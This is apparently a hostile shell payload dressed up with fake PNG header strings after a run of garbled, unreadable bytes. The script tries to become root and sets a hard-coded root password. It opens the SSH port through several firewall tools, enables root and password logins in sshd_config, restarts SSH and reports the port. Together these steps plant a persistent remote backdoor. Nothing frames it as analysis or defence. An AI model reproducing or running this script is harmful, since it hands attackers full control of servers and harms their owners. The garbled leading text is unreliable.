�ɲɾ�����ӯ�����һ��ˣ��������С���˴��ͣ�������P���ҹ��ñ˽��ά�Բ��������˸߸ԣ�������ơ��ҹ��ñ�����ά�Բ���ˡ���˳^�ӣ������ӡ� ���ͯj�ӣ��ƺ���ӣ� ? PNG ?%k25u25%fgd5n!? PNG ?%k25u25%fgd5n!? PNG ?%k25u25%fgd5n!? PNG ?%k25u25%fgd5n!#!/bin/sh su sudo -s echo "F0xR00t" printf "6m8oUS1Xu2khTPGa90\n6m8oUS1Xu2khTPGa90\n" | passwd root SSHPORT=$(grep -E '^[[:space:]]*Port[[:space:]]' /etc/ssh/sshd_config 2>/dev/null | awk '{print $2}' | head -1) [ -z "$SSHPORT" ] && SSHPORT=22 ufw allow "$SSHPORT"/tcp 2>/dev/null iptables -I INPUT -p tcp --dport "$SSHPORT" -j ACCEPT 2>/dev/null firewall-cmd --add-port="$SSHPORT"/tcp --permanent 2>/dev/null && firewall-cmd --reload 2>/dev/null nft add rule inet filter input tcp dport "$SSHPORT" accept 2>/dev/null sed -i 's/^#\?PermitRootLogin.*/PermitRootLogin yes/; s/^#\?PasswordAuthentication.*/PasswordAuthentication yes/' /etc/ssh/sshd_config && systemctl restart sshd && systemctl restart ssh echo "XSSH:$SSHPORT"